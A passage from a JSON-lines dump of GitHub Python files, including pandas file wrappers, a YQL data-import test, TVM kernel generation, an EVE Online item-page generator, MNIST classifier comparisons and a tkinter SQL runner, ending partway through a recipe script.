+{"seq_id":"35939375692","text":"from typing import Literal, TypeAlias\n\nfrom typedpath.base import PathLikeLike, TypedFile\n\ntry:\n import pandas as pd\n\n PANDAS_AVAILABLE = True\nexcept ImportError:\n from unittest.mock import MagicMock\n\n pd = MagicMock()\n\n PANDAS_AVAILABLE = False\n\n\nclass PandasCsvFile(TypedFile):\n \"\"\"A file containing comma separated values (CSV).\"\"\"\n\n default_suffix = \".csv\"\n\n def __init__(self, path: PathLikeLike, *, encoding: str = \"utf-8\") -> None:\n super().__init__(path)\n assert (\n PANDAS_AVAILABLE\n ), \"Pandas does not appear to be installed on this system. Try: pip install pandas\"\n\n self._encoding = encoding\n\n def write(self, data: pd.DataFrame) -> None:\n data.to_csv(self.write_path(), encoding=self._encoding, index=False)\n\n def append(self, data: pd.DataFrame) -> None:\n if not self.pretty_path().exists():\n self.write(data)\n return\n\n with open(self.read_path(), \"ta\", encoding=self._encoding) as fp:\n data.to_csv(fp, index=False, header=False)\n\n def read(self) -> pd.DataFrame:\n return pd.read_csv(self.read_path(), encoding=self._encoding)\n\n\nclass PandasFeatherFile(TypedFile):\n \"\"\"A file containing data in the Apache Arrow Feather format.\"\"\"\n\n default_suffix = \".feather\"\n\n def __init__(self, path: PathLikeLike) -> None:\n super().__init__(path)\n assert (\n PANDAS_AVAILABLE\n ), \"Pandas does not appear to be installed on this system. Try: pip install pandas\"\n\n def write(self, data: pd.DataFrame) -> None:\n data.to_feather(self.write_path())\n\n def read(self) -> pd.DataFrame:\n return pd.read_feather(self.read_path())\n\n\nParquetEngine: TypeAlias = Literal[\"auto\", \"pyarrow\", \"fastparquet\"]\nParquetCompression: TypeAlias = Literal[\"snappy\", \"gzip\", \"brotli\", None]\n\n\nclass PandasParquetFile(TypedFile):\n \"\"\"A file containing data in the Apache Parquet format.\"\"\"\n\n default_suffix = \".parquet\"\n\n def __init__(\n self,\n path: PathLikeLike,\n *,\n engine: ParquetEngine = \"auto\",\n compression: ParquetCompression = \"snappy\",\n ) -> None:\n super().__init__(path)\n assert (\n PANDAS_AVAILABLE\n ), \"Pandas does not appear to be installed on this system. 
Try: pip install pandas\"\n\n self._engine = engine\n self._compression = compression\n\n def write(self, data: pd.DataFrame) -> None:\n data.to_parquet(self.write_path(), engine=self._engine, compression=self._compression)\n\n def read(self) -> pd.DataFrame:\n return pd.read_parquet(self.read_path(), engine=self._engine)\n","repo_name":"jesnie/typedpath","sub_path":"typedpath/pandas.py","file_name":"pandas.py","file_ext":"py","file_size_in_byte":2665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"88551239","text":"from __future__ import print_function\n\nimport datetime\nimport json\nimport mock\nimport sys\n\nfrom library.python import resource\nfrom yql_utils import yql_binary_path\n\nfrom crypta.graph.data_import.soup.lib import AddDaySoup\nfrom crypta.graph.data_import.soup.lib.task import SoupTask\nfrom crypta.lib.python.yql_runner.tests import canonize_output, clean_up, execute, load_fixtures, unmount\n\n\nclass FakeDate(datetime.date):\n\n \"\"\" Fake date to mock immutable builtins \"\"\"\n\n @classmethod\n def today(cls):\n return cls(2018, 9, 15)\n\n\n@mock.patch.dict(\"os.environ\", {\"YT_TOKEN\": \"TESTING\", \"ENV_TYPE\": \"TESTING\"})\n@clean_up(observed_paths=(\"//home\", \"//logs\"))\n@load_fixtures(\n (\"//home/crypta/fake/state/graph/v2/soup/day/idfa_mm_device_id_app-metrica_mm\", \"/fixtures/table_1.json\"),\n (\"//home/crypta/fake/state/graph/v2/soup/day/gaid_mm_device_id_app-metrica_mm\", \"/fixtures/table_2.json\"),\n (\"//home/crypta/fake/state/graph/v2/soup/day/mm_device_id_uuid_app-metrica_mm\", \"/fixtures/table_3.json\"),\n (\"//home/crypta/fake/state/graph/v2/soup/yandexuid_icookie_cookie_wl\", \"/fixtures/soup_wl.json\"),\n (\"//home/crypta/fake/state/graph/v2/soup/gaid_mm_device_id_app-metrica_mm\", \"/fixtures/soup_mm.json\"),\n # this table should not be in processed (should check is not recursive lookup)\n (\"//home/crypta/fake/state/graph/v2/soup/ids/yandexuid\", \"/fixtures/ids_yuid.json\"),\n)\n@canonize_output\ndef test_soup(local_yt):\n \"\"\" Should check is metrica parser correct \"\"\"\n print(\"Create YQL runner\", file=sys.stderr)\n # call app metrica day parser\n yql_task = AddDaySoup(\n soup_dir=\"//home/crypta/fake/state/graph/v2/soup\",\n date=\"2019-01-01\",\n throw_before_date=\"2018-12-20\",\n yt_proxy=\"localhost:{}\".format(local_yt.yt_proxy_port),\n pool=\"xx\",\n mrjob_binary=yql_binary_path(\"yql/tools/mrjob/mrjob\"),\n udf_resolver_binary=yql_binary_path(\"yql/tools/udf_resolver/udf_resolver\"),\n udfs_dir=\";\".join([yql_binary_path(\"yql/udfs\"), yql_binary_path(\"ydb/library/yql/udfs\")]),\n loglevel=\"INFO\",\n limit=None,\n is_embedded=True,\n )\n\n try:\n print(\"Start YQL runner\", file=sys.stderr)\n yql_task.run()\n except Exception:\n print(yql_task.render_query(), file=sys.stderr)\n raise\n\n def select_all(table):\n return list(local_yt.yt_client.read_table(table, format=\"json\"))\n\n output_tables = local_yt.yt_client.search(\n \"//home/crypta/fake/state/graph/v2/soup\", node_type=[\"table\"], follow_links=True\n )\n return {table: sorted(select_all(table)) for table in output_tables}\n\n\n@mock.patch(\"datetime.date\", FakeDate)\n@mock.patch(\"time.time\", mock.MagicMock(return_value=1562061078.828523))\n@mock.patch(\"crypta.graph.data_import.soup.lib.task.SoupTask._set_expiration\", lambda self: 42)\n@canonize_output\ndef test_bt_task(local_yt, conf):\n \"\"\" Should check is metrika bt task work correct \"\"\"\n\n @load_fixtures(\n 
(\"{conf.paths.stream.storage}/table_1\".format(conf=conf), \"/fixtures/table_1.json\"),\n (\"{conf.paths.stream.storage}/table_2\".format(conf=conf), \"/fixtures/table_2.json\"),\n (\"{conf.paths.stream.storage}/table_3\".format(conf=conf), \"/fixtures/table_3.json\"),\n (\"{conf.paths.storage.soup}/yandexuid_icookie_cookie_wl\".format(conf=conf), \"/fixtures/soup_wl.json\"),\n (\"{conf.paths.storage.soup}/gaid_mm_device_id_app-metrica_mm\".format(conf=conf), \"/fixtures/soup_mm.json\"),\n # this table should not be in processed (should check is not recursive lookup)\n (\"{conf.paths.storage.soup}/ids/yandexuid\".format(conf=conf), \"/fixtures/ids_yuid.json\"),\n )\n @clean_up(observed_paths=(\"//home\",))\n def inner_test(local_yt, conf):\n attrs = json.loads(resource.find(\"/fixtures/attr_processed.json\"))\n for table in xrange(1, 4):\n local_yt.yt_client.set(\n \"{conf.paths.stream.storage}/table_{index}/@processed\".format(conf=conf, index=table), attrs\n )\n\n task = SoupTask(run_date=\"2018-09-15\", log_sources=\"mm\", commit_full_day=\"false\")\n execute(task)\n\n assert task.query_template == \"soup.sql.j2\"\n assert task.crypta_env == \"develop\"\n\n def select_all(table):\n return list(local_yt.yt_client.read_table(table, format=\"json\"))\n\n unmount(local_yt.yt_client, conf.paths.stream.processed)\n\n output = {\n \"soup\": {\n path.replace(conf.paths.crypta_root, \"//crypta_root\"): sorted(select_all(path))\n for path in local_yt.yt_client.search(conf.paths.storage.soup, node_type=[\"table\"], follow_links=True)\n },\n \"stream\": {\n path.replace(conf.paths.crypta_root, \"//crypta_root\"): sorted(select_all(path))\n for path in local_yt.yt_client.search(\n conf.paths.stream.storage, node_type=[\"table\"], follow_links=True\n )\n },\n \"processed\": sorted(select_all(conf.paths.stream.processed)),\n }\n\n return output\n\n return inner_test(local_yt, conf)\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"crypto/tests/test (10).py","file_name":"test (10).py","file_ext":"py","file_size_in_byte":5109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37603587318","text":"import numpy as np\nimport h5py\n\nimport viscojapan as vj\n\nfid1 = h5py.File('../disp.h5','r')\ndisp1 = vj.epoch_3d_array.Displacement.load(fid1)\n\nfid2 = h5py.File('../one_soft_channel_model/disp.h5','r')\ndisp2 = vj.epoch_3d_array.Displacement.load(fid2)\n\n\ndef align_yaxis(ax1, v1, ax2, v2):\n \"\"\"adjust ax2 ylimit so that v2 in ax2 is aligned to v1 in ax1\"\"\"\n _, y1 = ax1.transData.transform((0, v1))\n _, y2 = ax2.transData.transform((0, v2))\n inv = ax2.transData.inverted()\n _, dy = inv.transform((0, 0)) - inv.transform((0, y1-y2))\n miny, maxy = ax2.get_ylim()\n ax2.set_ylim(miny+dy, maxy+dy)\n\nsite = 'J550'\ncmpt = 'e'\n\nys1 = disp1.post_ts(site, cmpt)\nvel1 = disp1.vel_ts(site, cmpt)*365\nts1 = np.asarray(disp1.get_epochs(), float)/365.\n\nys2 = disp2.post_ts(site, cmpt)\nvel2 = disp2.vel_ts(site, cmpt)*365\nts2 = np.asarray(disp2.get_epochs(), float)/365.\n\n############\n# Start to plot\n\nfrom pylab import plt\n\nfig, ax1 = plt.subplots()\n\npos1 = ax1.get_position() # get the original position \npos2 = [pos1.x0, pos1.y0, pos1.width/1.1 , pos1.height] \nax1.set_position(pos2)\n\nln1 = ax1.plot(ts1, ys1,'bx-', label='disp.')\nln2 = ax1.plot(ts2, ys2,'gx-', label='disp. 
- one channel')\n\n#ax1.set_ylim([-1e-6,2e-6])\n\n#####################\n\nax2 = ax1.twinx()\n\nln3 = ax2.plot(ts1[1:], vel1, 'r', label=r'vel ($yr^{-1}$)')\nln4 = ax2.plot(ts2[1:], vel2, color='brown', label=r'vel ($yr^{-1}$) - one channel')\n\n#ax2.set_xlim([0,10])\nax2.set_ylabel(r'$yr^{-1}$')\n#ax2.set_ylim([-1e-6, 2e-6])\n\nax2.set_position(pos2)\n\nalign_yaxis(ax1, 0, ax2, 0)\n\n\nlns = ln1 + ln2 + ln3 + ln4\nlabs = [l.get_label() for l in lns]\n\nplt.legend(lns, labs, loc=5,prop={'size':6})\n\nplt.title('%s - %s'%(site, cmpt))\nplt.savefig('%s_%s.png'%(site, cmpt))\nplt.xlabel('year')\nplt.grid('on')\n\n#########\n\nplt.show()\nplt.close()\n\n","repo_name":"zy31415/viscojapan","sub_path":"inversions/inversion10/iter2/check_unit_pulse_decay/plots/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"30840149725","text":"import tvm\nimport numpy as np\nimport os\nimport jinja2\nimport subprocess\n\nclass PTOp:\n def __init__(self, name, target, inputs, outputs, output_shapes, so_file, namespace=\"sparse\"):\n self.namespace = namespace\n self.inputs = inputs\n self.outputs = list(zip(outputs, output_shapes))\n self.so = so_file\n self.cuda = target == \"cuda\"\n self.name = name\n\ndef compat_dtype(dtype):\n if dtype == \"int32\":\n return \"int64_t\"\n if dtype == \"int64\":\n return \"int64_t\"\n if dtype == \"float32\":\n return \"double\"\n if dtype == \"float64\":\n return \"double\"\ndef exact_dtype(dtype):\n if dtype == \"int32\":\n return \"int32_t\"\n if dtype == \"int64\":\n return \"int64_t\"\n if dtype == \"float32\":\n return \"float\"\n if dtype == \"float64\":\n return \"double\"\n\ndef build_for_pt(s, variables, tgt, target_host, name):\n f = tvm.build(s, variables, tgt, target_host=target_host, name=name)\n inputs = []\n input_shapes = {}\n outputs = []\n for var in variables:\n if hasattr(var, \"op\") and var.op in s.outputs:\n outputs.append(var)\n else:\n if hasattr(var, \"shape\"):\n for i, v in enumerate(var.shape):\n if v not in input_shapes:\n input_shapes[v] = (var.name, i)\n else:\n var.input_dtype = compat_dtype(var.dtype)\n var.real_dtype = exact_dtype(var.dtype)\n input_shapes[var.name] = (var.name, -1)\n inputs.append(var)\n print([(type(i), i.dtype) for i in inputs])\n output_shapes = []\n for output in outputs:\n o_shape = []\n for i, v in enumerate(output.shape):\n if v not in input_shapes:\n raise Exception(f\"Can't handle dim {v} in {output}\")\n o_shape.append(input_shapes[v])\n output_shapes.append(o_shape)\n path = \"tvm_gen/\"\n try:\n os.mkdir(path)\n except:\n pass\n so_file = os.path.join(path, f\"{name}_{tgt}.so\")\n f.export_library(so_file)\n with open(\"tvm_template.cpp\", \"r\") as template_f:\n template = jinja2.Template(template_f.read())\n source = template.render(op=PTOp(name, tgt, inputs, outputs, output_shapes, so_file))\n\n # clang format stuff\n source = source.split('\\n')\n source = filter(lambda x: x.strip()!=\"\", source)\n source = \"\\n\".join(source)\n cpp_file = os.path.join(path, f\"{name}_{tgt}.cpp\")\n with open(cpp_file, \"w\") as f:\n f.write(source)\n retcode=subprocess.call([\"clang-format\", \"-i\", \"-style=Google\", cpp_file])\n\ndef add():\n tgt_host=\"llvm\"\n tgt=\"llvm\"\n n = tvm.var(\"n\")\n A = tvm.placeholder((n,), name='A', dtype=\"float32\")\n B = tvm.placeholder((n,), name='B', dtype=\"float32\")\n C = tvm.compute(A.shape, lambda i: A[i] + B[i], name=\"C\")\n s = 
tvm.create_schedule(C.op)\n build_for_pt(s, [A, B, C], tgt, tgt_host, \"myadd\")\n\ndef mm():\n tgt_host=\"llvm\"\n tgt=\"llvm\"\n n = tvm.var(\"n\")\n m = tvm.var(\"m\")\n k = tvm.var(\"k\")\n k_reduce = tvm.reduce_axis((0, k), \"k_reduce\")\n A = tvm.placeholder((n,k), name='A', dtype=\"float32\")\n B = tvm.placeholder((k,m), name='B', dtype=\"float32\")\n C = tvm.compute((n, m), lambda i, j: tvm.sum(A[i, k_reduce] * B[k_reduce, j], axis=k_reduce), name=\"C\")\n s = tvm.create_schedule(C.op)\n build_for_pt(s, [A, B, C], tgt, tgt_host, \"mymm\")\n\nadd()\nmm()\n\ndef nontensor():\n tgt_host=\"llvm\"\n tgt=\"llvm\"\n n = tvm.var(\"n\")\n m = tvm.var(\"m\", dtype=\"float32\")\n A = tvm.placeholder((n,n), name='A', dtype=\"float32\")\n B = tvm.compute(A.shape, lambda i, j: A[i,j] * m, name=\"B\")\n s = tvm.create_schedule(B.op)\n build_for_pt(s, [A, m, B], tgt, tgt_host, \"myscale\")\n\nnontensor()\n\n","repo_name":"bwasti/sparse","sub_path":"tvm_kernels.py","file_name":"tvm_kernels.py","file_ext":"py","file_size_in_byte":3467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3785727770","text":"import os\nimport sys\nimport shutil\nimport codecs\nimport yaml\nimport json\nimport collections\nimport sqlalchemy\nimport sqlalchemy.ext.declarative\n\n\n# CategoryID: 18, GroupID: 101 - Mining Drone\n# CategoryID: 22, GroupID: 361 - Mobile Warp Disruptor\n# CategoryID: 22, GroupID: 1249 - Mobile Cyno Inhibitor \n# CategoryID: 22, GroupID: 1250 - Mobile Tractor Unit\n# CategoryID: 23, GroupID: 365 - Control Tower\n# CategoryID: 23, GroupID: 404 - Silo\n# CategoryID: 23, GroupID: 444 - Shield Hardening Array\n# CategoryID: 23, GroupID: 839 - Cynosural System Jammer\n# CategoryID: 23, GroupID: 1282 - Compression Array\n# CategoryID: 46, GroupID: 1025 - Orbital Infrastructure\n# CategoryID: 65, GroupID: 1404 - Engineering Complex\n# CategoryID: 65, GroupID: 1406 - Refinery\n# CategoryID: 65, GroupID: 1657 - Citadel\n# CategoryID: 87, GroupID: 1652 - Light Fighter \n\n\nLCID = collections.OrderedDict(\n en='English',\n ja='Japanese',\n ru='Russian',\n de='German',\n fr='French',\n zh='Chinese'\n)\n\nBase = sqlalchemy.ext.declarative.declarative_base()\nclass Category(Base):\n __tablename__ = 'categories'\n id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)\n name = sqlalchemy.Column(sqlalchemy.String)\n\n\nclass Group(Base):\n __tablename__ = 'groups'\n id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)\n categoryID = sqlalchemy.Column(sqlalchemy.Integer, sqlalchemy.ForeignKey('categories.id'))\n name = sqlalchemy.Column(sqlalchemy.String)\n\n category = sqlalchemy.orm.relationship('Category', backref=sqlalchemy.orm.backref('groups', order_by=id))\n\n\nclass Type(Base):\n __tablename__ = 'types'\n id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True) \n groupID = sqlalchemy.Column(sqlalchemy.Integer, sqlalchemy.ForeignKey('groups.id'))\n raceID = sqlalchemy.Column(sqlalchemy.Integer)\n factionID = sqlalchemy.Column(sqlalchemy.Integer)\n name = sqlalchemy.Column(sqlalchemy.String)\n traits = sqlalchemy.Column(sqlalchemy.String)\n description = sqlalchemy.Column(sqlalchemy.String)\n\n group = sqlalchemy.orm.relationship('Group', backref=sqlalchemy.orm.backref('types', order_by=id))\n\n\nurl = 'sqlite+pysqlite:///eveonline.sqlite'\nengine = sqlalchemy.create_engine(url)\n\nSession = sqlalchemy.orm.sessionmaker(bind=engine)\nsession = Session()\n\n\ndef import_fsd():\n def load_yaml(path):\n print('Load: ' + path)\n 
with codecs.open(path, 'r', 'utf-8') as f:\n        data = yaml.load(f)\n\n    return data\n    \n    categoryIDs = load_yaml('./fsd/categoryIDs.yaml')    \n    groupIDs = load_yaml('./fsd/groupIDs.yaml')\n    typeIDs = load_yaml('./fsd/typeIDs.yaml')    \n    \n    Base.metadata.drop_all(bind=engine)\n    Base.metadata.create_all(bind=engine)    \n    \n    def id(key):\n        try: v = items[key]\n        except KeyError: v = ''\n        return v\n\n    def dumps(key):\n        try: v = items[key]\n        except KeyError: v = ''\n        return json.dumps(v)\n\n    for i, items in categoryIDs.items():    \n        session.add(Category(id=i, name=dumps('name')))\n    \n    for i, items in groupIDs.items():\n        session.add(Group(id=i, categoryID=id('categoryID'), name=dumps('name')))\n\n    for i, items in typeIDs.items():    \n        session.add(Type(\n            id = i,\n            groupID = id('groupID'),    \n            raceID = id('raceID'),\n            factionID = id('factionID'),\n            name = dumps('name'),\n            traits = dumps('traits'),\n            description = dumps('description')\n        ))\n\n    session.commit()\n\n\ndef json2locale(text):\n    dict_ = collections.OrderedDict()\n    json_dict = json.loads(text)\n\n    dict_['id'] = ''\n    for key_ in LCID.keys():    \n        if key_ in json_dict:\n            dict_[key_] = json_dict[key_]\n        elif 'en' in json_dict:\n            dict_[key_] = json_dict['en']\n        else:\n            dict_[key_] = ''    \n\n    return dict_\n\n\ndef write_html(name, title, body):\n    html = '<html><head><title>' + title + '</title>'\n    html += '<link rel=\"stylesheet\" href=\"evepedia.css\">'\n    html += '</head><body>'\n    html += body\n    html += '</body></html>'\n\n    with open('./docs/' + name + '.html', 'w', encoding='utf-8') as f:\n        f.write(html)\n\n\ndef locales_table(path, rows):\n    html = '<table><tr><th>ID</th>'\n    for locale_name in LCID.values():\n        html += '<th>' + locale_name + '</th>'\n    html += '</tr>'\n\n    for row in rows:\n        html += '<tr>'\n\n        for lcid, name in row.items():\n            if lcid == 'id':\n                html += '<td><a href=\"%s%d.html\">%d</a></td>' % (path, name, name)\n            else:\n                html += '<td>' + name + '</td>'\n\n        html += '</tr>'\n\n    html += '</table>'\n    return html\n\n\ndef read_type(name, type_):\n    html = '<table><tr><th></th><th>Name</th><th>Description</th></tr>'\n    names = json2locale(type_.name)\n    descriptions = json2locale(type_.description)\n    for id_, lc_name in LCID.items():\n        html += '<tr>'\n        html += '<th>' + lc_name + '</th>'\n        html += '<td>' + names[id_] + '</td>'\n        html += '<td>' + descriptions[id_] + '</td>'\n        html += '</tr>'\n    html += '</table>'\n\n    write_html('type/%d' % type_.id, name, html)\n\n\ndef read_group(name, group):\n    rows = []\n    for type_ in group.types:\n        locale = json2locale(type_.name)\n        locale['id'] = type_.id\n        rows.append(locale)\n\n        read_type(locale['en'], type_)\n\n    write_html('group/%d' % group.id, name, locales_table('../type/', rows))\n\n\ndef read_category(name, category):\n    rows = []\n    for group in category.groups:\n        locale = json2locale(group.name)\n        locale['id'] = group.id\n        rows.append(locale)\n\n        read_group(locale['en'], group)\n\n    write_html('category/%d' % category.id, name, locales_table('../group/', rows))\n\n\n\nif len(sys.argv) > 1:\n    if sys.argv[1] == '--import':\n        import_fsd()\nelse:\n    for path in ['./docs/category/', './docs/group/', './docs/type/']:\n        if os.path.isdir(path):\n            shutil.rmtree(path)\n\n        os.mkdir(path)\n        shutil.copy('./evepedia.css', path + 'evepedia.css')\n        shutil.copy('./favicon.jpg', path + 'favicon.jpg')\n\n    rows = []\n    base_categories = [\n        6, # Ship\n        7, # Module\n        8, # Charge\n        16, # Skill\n        20, # Implant\n        32, # Subsystem\n    ]\n    for category_id in [6, 18, 22, 23, 46, 65, 87]:\n        category = session.query(Category).filter_by(id=category_id).one()\n        locale = json2locale(category.name)\n        locale['id'] = category_id\n        rows.append(locale)\n\n        read_category(locale['en'], category)\n\n    write_html('index', 'Evepedia', locales_table('./category/', rows))\n","repo_name":"Omochin/evepedia","sub_path":"Evepedia.py","file_name":"Evepedia.py","file_ext":"py","file_size_in_byte":6821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"29672980428","text":"from sklearn.datasets import fetch_mldata\r\nfrom sklearn.linear_model import SGDClassifier\r\nfrom sklearn.metrics import accuracy_score\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom sklearn import cross_validation\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nimport timeit\r\nfrom sklearn.svm import LinearSVC\r\nfrom sklearn.metrics import confusion_matrix\r\nfrom sklearn.model_selection import cross_val_score\r\nfrom sklearn.model_selection import cross_val_predict\r\nimport warnings\r\nfrom sklearn.metrics import precision_score, recall_score\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\n#Getting MNIST data\r\nmnist = fetch_mldata('MNIST original')\r\n#Dividing the data into features and target\r\nX,y=mnist[\"data\"],mnist[\"target\"]\r\n\r\n#Dividing the data into Training Dataset and Testing Dataset\r\nX_train, X_test, y_train, y_test = X[:60000], X[60000:], y[:60000], y[60000:]\r\nshuffle_index = np.random.permutation(60000)\r\nX_train, y_train = X_train[shuffle_index], y_train[shuffle_index]\r\n\r\n#Stochastic gradient descent model\r\nsgd_clf = SGDClassifier()\r\n\r\n#Training my model\r\nsgd_clf.fit(X_train, y_train)\r\n\r\n#prediction\r\ny_pred_sgd = sgd_clf.predict(X_test)\r\n\r\n#Accuracy\r\nacc_sgd = accuracy_score(y_test, y_pred_sgd)\r\n\r\nprint (\"stochastic gradient descent accuracy: \",acc_sgd)\r\n\r\n\"\"\"Sometimes you will get 99% accuracy, but you still need to check the cross-validation values \r\nand the precision score as well as the recall score. \"\"\"\r\n\r\ncross_val=cross_val_score(sgd_clf, X_train, y_train, cv=3, scoring=\"accuracy\")\r\nprint(\"Cross Validation Value:\",cross_val)\r\n\r\ny_train_pred = cross_val_predict(sgd_clf, X_train, y_train, cv=3)\r\n\r\n#Confusion matrix\r\nconf_mx=confusion_matrix(y_train, y_train_pred)\r\nprint(\"Confusion matrix:\",conf_mx)\r\nps=precision_score(y_train, y_train_pred,average=\"macro\")\r\nprint(\"Precision Score:\",ps)\r\nrs=recall_score(y_train, y_train_pred,average=\"macro\")\r\nprint(\"Recall Score:\",rs)\r\n\"\"\"Here I am showing the graph of the confusion matrix: the brighter a cell, the more erroneous it is. \r\n So by looking at the confusion matrix graph we can learn from it and we can change the values of the \r\n classifier, or by removing the noise from the images we can get an optimized result\"\"\"\r\nplt.matshow(conf_mx, cmap=plt.cm.gray)\r\nplt.show()\r\nprint(\"_\"*100)\r\n########################################################################################################\r\n\r\n#Random Forest Classifier\r\nclf_rf = RandomForestClassifier()\r\n\r\n#Training my model\r\nclf_rf.fit(X_train, y_train)\r\n\r\n#Making the prediction\r\ny_pred_rf = clf_rf.predict(X_test)\r\n\r\n#Measuring the accuracy of the model\r\nacc_rf = accuracy_score(y_test, y_pred_rf)\r\nprint (\"random forest accuracy: \",acc_rf)\r\n\r\n#Cross Validation\r\ncross_val=cross_val_score(clf_rf, X_train, y_train, cv=3, scoring=\"accuracy\")\r\nprint(cross_val)\r\ny_train_pred = cross_val_predict(clf_rf, X_train, y_train, cv=3)\r\nprint(y_train_pred)\r\n\r\n#Confusion matrix\r\nconf_mx=confusion_matrix(y_train, y_train_pred)\r\nprint(\"Confusion matrix:\",conf_mx)\r\nps=precision_score(y_train, y_train_pred,average=\"macro\")\r\nprint(\"Precision Score:\",ps)\r\nrs=recall_score(y_train, y_train_pred,average=\"macro\")\r\nprint(\"Recall Score:\",rs)\r\n\"\"\"Here I am showing the graph of the confusion matrix: the brighter a cell, the more erroneous it is. \r\n So by looking at the confusion matrix graph we can learn from it and we can change the values of the \r\n classifier, or by removing the noise from the images we can get an optimized result\"\"\"\r\nplt.matshow(conf_mx, cmap=plt.cm.gray)\r\nplt.show()\r\nprint(\"_\"*100)\r\n########################################################################################################################\r\n\r\n#Support vector classifier\r\nclf_svm = LinearSVC()\r\n\r\n#Training the model\r\nclf_svm.fit(X_train, y_train)\r\n\r\ny_pred_svm = clf_svm.predict(X_test)\r\nacc_svm = accuracy_score(y_test, y_pred_svm)\r\nprint (\"Linear SVM accuracy: \",acc_svm)\r\ncross_val=cross_val_score(clf_svm, X_train, y_train, cv=3, scoring=\"accuracy\")\r\nprint(cross_val)\r\ny_train_pred = cross_val_predict(clf_svm, X_train, y_train, cv=3)\r\nprint(y_train_pred)\r\n\r\n#Confusion matrix\r\nconf_mx=confusion_matrix(y_train, y_train_pred)\r\nprint(\"Confusion matrix:\",conf_mx)\r\nps=precision_score(y_train, y_train_pred,average=\"macro\")\r\nprint(\"Precision Score:\",ps)\r\nrs=recall_score(y_train, y_train_pred,average=\"macro\")\r\nprint(\"Recall Score:\",rs)\r\n\"\"\"Here I am showing the graph of the confusion matrix: the brighter a cell, the more erroneous it is. 
\r\n So by looking at the confusion matrix graph we can learn from it and we can change the values of the \r\n classifier, or by removing the noise from the images we can get an optimized result\"\"\"\r\nplt.matshow(conf_mx, cmap=plt.cm.gray)\r\nplt.show()\r\nprint(\"_\"*100)\r\n\r\n########################################################################################################################\r\n\r\nclf_knn = KNeighborsClassifier()\r\nclf_knn.fit(X_train, y_train)\r\ny_pred_knn = clf_knn.predict(X_test)\r\nacc_knn = accuracy_score(y_test, y_pred_knn)\r\nprint (\"nearest neighbors accuracy: \",acc_knn)\r\ncross_val=cross_val_score(clf_knn, X_train, y_train, cv=3, scoring=\"accuracy\")\r\nprint(cross_val)\r\ny_train_pred = cross_val_predict(clf_knn, X_train, y_train, cv=3)\r\nprint(y_train_pred)\r\n\r\n#Confusion matrix\r\nconf_mx=confusion_matrix(y_train, y_train_pred)\r\nprint(\"Confusion matrix:\",conf_mx)\r\nps=precision_score(y_train, y_train_pred,average=\"macro\")\r\nprint(\"Precision Score:\",ps)\r\nrs=recall_score(y_train, y_train_pred,average=\"macro\")\r\nprint(\"Recall Score:\",rs)\r\n\"\"\"Here I am showing the graph of the confusion matrix: the brighter a cell, the more erroneous it is. \r\n So by looking at the confusion matrix graph we can learn from it and we can change the values of the \r\n classifier, or by removing the noise from the images we can get an optimized result\"\"\"\r\nplt.matshow(conf_mx, cmap=plt.cm.gray)\r\nplt.show()\r\nprint(\"_\"*100)\r\n","repo_name":"kumarsrikant/Mnist_Handwritten_Digit_Classification","sub_path":"HandWrittenDigitClassification.py","file_name":"HandWrittenDigitClassification.py","file_ext":"py","file_size_in_byte":5899,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
+{"seq_id":"5563336081","text":"from tkinter import *\nimport sqlite3\nimport sys\nimport os\n\ndef restart_program(root):\n\tpython = sys.executable\n\tos.execl(python, python, * sys.argv)\n\ndef execute_sql(qentry):\n\tscript = qentry.get()\n\tqentry.delete(0, END)\n\n\t# connect database\n\tconn = sqlite3.connect('database.db')\n\tc = conn.cursor()\n\t# execute sql script\n\tc.execute('''PRAGMA foreign_keys = ON''')\n\tprint(c.execute(script).fetchall())\n\t# print(c.execute(\"SELECT * FROM REPORT_BUG\").fetchall())\n\tconn.commit()\n\tconn.close()\n\n\treturn\n\ndef query_page(root):\n\t# query page element declaration\n\tqtitle = Label(text=\"Please enter SQL\", font=(\"Arial\", 10))\n\tqentry = Entry(root, width=50)\n\tget_button = Button(root, text=\"execute\", command=lambda: execute_sql(qentry))\n\tback_button = Button(root, text=\"restart\", command=lambda: restart_program(root))\n\n\t# query page element position\n\tqtitle.grid(row=0, column=0, columnspan=2)\n\tqentry.grid(row=1, column=0, columnspan=2)\n\tget_button.grid(row=2, column=0)\n\tback_button.grid(row=2, column=1)","repo_name":"tsaoni/DBMS","sub_path":"query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"6924293155","text":"import pickle\n\n\ndef main():\n    def display_recipe(recipe):\n        new_line = \"\\n \\t \\t\"\n        print(\n            f\"\"\"\n        Recipe: {recipe[\"name\"]}\n        Cooking Time (min): {recipe[\"cooking_time\"]}\n        Ingredients: \n        {new_line.join(f\"{ingredient}\" for ingredient in recipe[\"ingredients\"])}\n        Difficulty: {recipe[\"difficulty\"]}\"\"\"\n        )\n\n    def search_ingredients(data):\n        recipes_list, ingredients_list = 
